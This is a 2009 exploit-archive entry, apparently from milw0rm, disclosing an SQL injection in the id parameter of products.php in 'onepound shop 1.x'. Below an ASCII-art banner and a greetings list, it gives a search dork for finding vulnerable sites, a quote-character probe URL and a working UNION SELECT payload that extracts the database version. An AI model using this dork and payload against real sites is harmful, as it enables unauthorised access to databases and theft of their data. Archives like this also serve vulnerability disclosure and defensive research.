onepound shop 1.x - products.php SQL Injection

2009-07-13T00:00:00
ID EXPLOITPACK:5E4EB757BB425C23820BEB3553712B7B
Type exploitpack
Reporter Affix
Modified 2009-07-13T00:00:00

Description

onepound shop 1.x - products.php SQL Injection

                                        
                                            #################################################################
#		      _______ _________ _       		#
#		     (  ____ )\__   __/( (    /|		#
#		     | (    )|   ) (   |  \  ( |		#
#		     | (____)|   | |   |   \ | |		#
#		     |     __)   | |   | (\ \) |		#
#		     | (\ (      | |   | | \   |		#
#		     | ) \ \__   | |   | )  \  |		#
#		     |/   \__/   )_(   |/    )_)		#
#                        http://root-the.net 			#
#################################################################
#[+] onepund shop 1.x products.php SQL Injection Vulnerability  #
#[+] Vendor : onepound.cn <ttp://www.onepound.cn/>              #
#[+] Exploit : Affix <root@root-the.net>			#
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead,  #
#	      str0ke, tekto, SonicX, Android, tw0		#
#[+] dork : "Powered by OnePound"				#
#################################################################

Example :
   http://site.com/products.php?id='

Demo :
   http://site.com/products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13--

# milw0rm.com [2009-07-13]